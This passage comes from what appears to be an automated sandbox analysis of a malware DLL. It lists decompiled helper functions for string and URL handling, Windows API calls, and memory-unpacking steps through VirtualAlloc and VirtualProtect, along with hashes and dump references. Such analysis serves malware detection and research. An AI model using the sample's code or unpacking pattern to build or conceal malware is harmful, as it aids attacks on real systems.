                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                  • String ID: PGt
                                                                                                                                  • API String ID: 1564683301-293773470
                                                                                                                                  • Opcode ID: c87d6411f13d48a88c0fba404d8e341a2c43a3fe8f0bf52599bb1d2bca514810
                                                                                                                                  • Instruction ID: a1e6139c41b20070ae69def55aeb289323bf957e719b81373ac6bbeea34876ea
                                                                                                                                  • Opcode Fuzzy Hash: c87d6411f13d48a88c0fba404d8e341a2c43a3fe8f0bf52599bb1d2bca514810
                                                                                                                                  • Instruction Fuzzy Hash: 5DE0123A501A3227423199AE4C44D6BDD5CEF9D9F37050525B905D3110DB20C80291F4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1EC1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E031A1EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E031A75F6(_t2);
				if(_t34 != 0) {
					_t30 = E031A75F6(_t28);
					if(_t30 == 0) {
						E031A4AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E031AA971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E031AA971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                  0x031a1ec1
                                                                                                                                  0x031a1ecb
                                                                                                                                  0x031a1ecd
                                                                                                                                  0x031a1ed3
                                                                                                                                  0x031a1ed3
                                                                                                                                  0x031a1edc
                                                                                                                                  0x031a1ee0
                                                                                                                                  0x031a1eec
                                                                                                                                  0x031a1ef0
                                                                                                                                  0x031a1f64
                                                                                                                                  0x031a1ef2
                                                                                                                                  0x031a1ef2
                                                                                                                                  0x031a1ef6
                                                                                                                                  0x031a1efb
                                                                                                                                  0x031a1f00
                                                                                                                                  0x031a1f1a
                                                                                                                                  0x031a1f09
                                                                                                                                  0x031a1f09
                                                                                                                                  0x031a1f0d
                                                                                                                                  0x031a1f10
                                                                                                                                  0x031a1f15
                                                                                                                                  0x031a1f15
                                                                                                                                  0x031a1f1f
                                                                                                                                  0x031a1f47
                                                                                                                                  0x031a1f4d
                                                                                                                                  0x031a1f50
                                                                                                                                  0x031a1f21
                                                                                                                                  0x031a1f23
                                                                                                                                  0x031a1f2b
                                                                                                                                  0x031a1f36
                                                                                                                                  0x031a1f3b
                                                                                                                                  0x031a1f3b
                                                                                                                                  0x031a1f57
                                                                                                                                  0x031a1f5e
                                                                                                                                  0x031a1f5f
                                                                                                                                  0x031a1f5f
                                                                                                                                  0x031a1ef0
                                                                                                                                  0x031a1f6f

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,031A5405,00000000,00000000,74E481D0,05BD9618,?,?,031A2A8A,?,05BD9618), ref: 031A1ECD
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                    • Part of subcall function 031AA971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,031A1EFB,00000000,00000001,00000001,?,?,031A5405,00000000,00000000,74E481D0,05BD9618), ref: 031AA97F
                                                                                                                                    • Part of subcall function 031AA971: StrChrA.SHLWAPI(?,0000003F,?,?,031A5405,00000000,00000000,74E481D0,05BD9618,?,?,031A2A8A,?,05BD9618,0000EA60,?), ref: 031AA989
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,031A5405,00000000,00000000,74E481D0,05BD9618,?,?,031A2A8A), ref: 031A1F2B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,74E481D0), ref: 031A1F3B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 031A1F47
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3767559652-0
                                                                                                                                  • Opcode ID: 0a85702b288c40f416b0b0cbda5fb41798edffb4584f5b63c74cc08f5f492c7f
                                                                                                                                  • Instruction ID: 8139db6b5e3b48431322a1993ff39f284758e28da1c3786a5ffc729e791d64fa
                                                                                                                                  • Opcode Fuzzy Hash: 0a85702b288c40f416b0b0cbda5fb41798edffb4584f5b63c74cc08f5f492c7f
                                                                                                                                  • Instruction Fuzzy Hash: 6021937E504B95BBCB02DF7CC844AAA7FA9EF0A281F094064F9049F212D734C94487A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A131E, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E031A75F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                  0x031a1333
                                                                                                                                  0x031a1337
                                                                                                                                  0x031a1341
                                                                                                                                  0x031a1346
                                                                                                                                  0x031a134b
                                                                                                                                  0x031a134d
                                                                                                                                  0x031a1355
                                                                                                                                  0x031a135a
                                                                                                                                  0x031a1368
                                                                                                                                  0x031a136d
                                                                                                                                  0x031a1377

                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,05BD9364,?,031A50AD,004F0053,05BD9364,?,?,?,?,?,?,031A54EF), ref: 031A132E
                                                                                                                                  • lstrlenW.KERNEL32(031A50AD,?,031A50AD,004F0053,05BD9364,?,?,?,?,?,?,031A54EF), ref: 031A1335
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,031A50AD,004F0053,05BD9364,?,?,?,?,?,?,031A54EF), ref: 031A1355
                                                                                                                                  • memcpy.NTDLL(74E069A0,031A50AD,00000002,00000000,004F0053,74E069A0,?,?,031A50AD,004F0053,05BD9364), ref: 031A1368
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2411391700-0
                                                                                                                                  • Opcode ID: 11e81936c2f81644d1e376305b216c2af246a3779da5e069dedc6c72c50495b1
                                                                                                                                  • Instruction ID: 07bde782fac07afc7590684d020b53ff6361dbef45a9421d69b5ca7fb48c1d8e
                                                                                                                                  • Opcode Fuzzy Hash: 11e81936c2f81644d1e376305b216c2af246a3779da5e069dedc6c72c50495b1
                                                                                                                                  • Instruction Fuzzy Hash: E2F0FF7A900519BBCF11EFA9CD44C9F7BACEF492557154066FD04DB101E731EA149BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A38CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(05BD9B10,00000000,00000000,7691C740,031A467E,00000000), ref: 031A38DA
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 031A38E2
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • lstrcpy.KERNEL32(00000000,05BD9B10), ref: 031A38F6
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 031A3901
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 74227042-0
                                                                                                                                  • Opcode ID: c04f0f971771272c2ed29820919bb992d2573ae54260b505324af57a15ca39d4
                                                                                                                                  • Instruction ID: e786c6d71f3fbcd6ca639e5f17c03406a3d4dfc2471b11a4c1b70a0c1bcad7cc
                                                                                                                                  • Opcode Fuzzy Hash: c04f0f971771272c2ed29820919bb992d2573ae54260b505324af57a15ca39d4
                                                                                                                                  • Instruction Fuzzy Hash: 3DE0927B501E20678711ABE8AD48C5BFBACEF8D7623040416F600D3104CB2089019BF1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Analysis Process: rundll32.exe PID: 6012 Parent PID: 7088 rundll32.exeCOMMON

                                                                                                                                  Executed Functions

                                                                                                                                  Function 6E97DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6E97DA28), ref: 6E97E097
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E97DA88), ref: 6E97E0CE
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E97E12E
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E164
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00000000,00000004,6E97DFB9), ref: 6E97E269
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00001000,00000004,6E97DFB9), ref: 6E97E290
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9), ref: 6E97E35D
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9,?), ref: 6E97E3B3
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E3CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548674297.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                  • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction ID: 1532731c19047ecb8d8048b55b1c182ca6af44890a261f2af2e2ca0a8a368f86
                                                                                                                                  • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction Fuzzy Hash: 4FD17C725206219FDB22CF54CC80A9237E7FF49B91F0841A8ED4A9F34AD370AA05CF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8E5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E8E5696
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97B7A0,000008BB), ref: 6E8E576F
                                                                                                                                    • Part of subcall function 6E8E72B0: task.LIBCPMTD ref: 6E8E7352
                                                                                                                                    • Part of subcall function 6E8EBA20: swap.LIBCPMTD ref: 6E8EBA39
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E967144,?,?,?,?,?,00000000), ref: 6E8E5950
                                                                                                                                  • std::locale::locale.LIBCPMTD ref: 6E8E59D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 756721536-1684325040
                                                                                                                                  • Opcode ID: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction ID: 4548c44c63027359671f4cf293aaa57d58b060eb914cd35c51bf336499526202
                                                                                                                                  • Opcode Fuzzy Hash: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction Fuzzy Hash: 7F524EF0A08624CFCF08CFA9D990AA977B6FF8B305F108929D54597794D7B8984DCB44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EC1E0, Relevance: 6.7, APIs: 1, Strings: 2, Instructions: 1462COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97C338,000008BB), ref: 6E8ED345
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: 1$N
                                                                                                                                  • API String ID: 514040917-3127171972
                                                                                                                                  • Opcode ID: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction ID: 92d9c2a95a581243fc26319c9670bf7367607d88b09f3bb69790878a78ee42e5
                                                                                                                                  • Opcode Fuzzy Hash: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction Fuzzy Hash: B7F260F150C9B08ECF08CF69CA90A797BB2FF97305B14891AD5459A785E3B8D58CDB08
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6E97A0D4,00000000), ref: 6E9314AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction ID: 33ade8be65f4f0e96915dc9de31944de636d38c0d5e1cf206d72fab4f015bedb
                                                                                                                                  • Opcode Fuzzy Hash: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction Fuzzy Hash: 2CF0E03160493557EB515AF7881CF9B37AD9F83770B31C5219C54D63A4DB30D8058DE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F5C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(?), ref: 6E8F5C69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  • Opcode ID: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction ID: ea0b29dbe5e6a269ff91347ced616a4077e37ffaf3acb5e122e88cc3d2e5b3f4
                                                                                                                                  • Opcode Fuzzy Hash: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction Fuzzy Hash: 21D0C9B000CF14DFDF05AF54E8147A43BB8FF07306F000428E40D93698D7B59468CA48
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 6E93E84C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E8E5
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E90E
                                                                                                                                  • GetACP.KERNEL32(?,?,6E93EB6A,?,00000000), ref: 6E93E923
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  • Opcode ID: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction ID: 4318d4e15fb3c2a6cba4e2a94113be2d0a92a1864bfaa58d4dacbab557bf9533
                                                                                                                                  • Opcode Fuzzy Hash: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction Fuzzy Hash: 5921D822E54325EAD7A48BD9C901BCB77BFEF45B54B624824E905D7508F732DD40CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E163
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E18E
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E222
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E230
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E93E2F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4147378913-0
                                                                                                                                  • Opcode ID: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction ID: c6d8739dd68596a371a97e8dcb328ee0b019f3e5ea5c901a74b8c575f3f97c1a
                                                                                                                                  • Opcode Fuzzy Hash: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction Fuzzy Hash: 58710571604326AAEB659BF5CC55BAB73ACEF95304F30082AE919D7280EB70ED40CF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F2FB
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F331
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E93EB2D
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 6E93EB76
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 6E93EB85
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E93EBCD
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E93EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 949163717-0
                                                                                                                                  • Opcode ID: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction ID: f5b76edcd0818ccb7702ed09539865fab5fd7df22fd364fd79be819ae7d38921
                                                                                                                                  • Opcode Fuzzy Hash: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction Fuzzy Hash: B7515B71A0072AABEF51DFE6CC44AAEB7BCBF59304F24046AA911E7180E770DD408F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E906CAF, Relevance: 48.3, APIs: 32, Instructions: 287COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E906CB6
                                                                                                                                  • collate.LIBCPMT ref: 6E906CBF
                                                                                                                                    • Part of subcall function 6E9059D8: __EH_prolog3_GS.LIBCMT ref: 6E9059DF
                                                                                                                                    • Part of subcall function 6E9059D8: __Getcoll.LIBCPMT ref: 6E905A43
                                                                                                                                    • Part of subcall function 6E9059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E905A5F
                                                                                                                                  • __Getcoll.LIBCPMT ref: 6E906D05
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D19
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D2E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D7F
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EB4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EC7
                                                                                                                                  • int.LIBCPMT ref: 6E906ED4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EE4
                                                                                                                                  • int.LIBCPMT ref: 6E906EF1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F01
                                                                                                                                  • int.LIBCPMT ref: 6E906F0E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F1E
                                                                                                                                  • int.LIBCPMT ref: 6E906CDF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • int.LIBCPMT ref: 6E906D42
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D6C
                                                                                                                                  • int.LIBCPMT ref: 6E906D97
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DC5
                                                                                                                                  • int.LIBCPMT ref: 6E906DD2
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DF9
                                                                                                                                  • int.LIBCPMT ref: 6E906E06
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906E56
                                                                                                                                  • int.LIBCPMT ref: 6E906E63
                                                                                                                                  • int.LIBCPMT ref: 6E906F36
                                                                                                                                  • numpunct.LIBCPMT ref: 6E906F5D
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F6D
                                                                                                                                  • int.LIBCPMT ref: 6E906F7A
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FB1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FC4
                                                                                                                                  • int.LIBCPMT ref: 6E906FD1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2009638416-0
                                                                                                                                  • Opcode ID: 5195ae5fe1ba27b78dce64a43bb060e5bbb0142ffaecce9ce4d23e93c20746c1
                                                                                                                                  • Instruction ID: 82ef8fcf1f7143299f74a75ee5823f1482c64c909b969f933c8b51682a3cdcb0
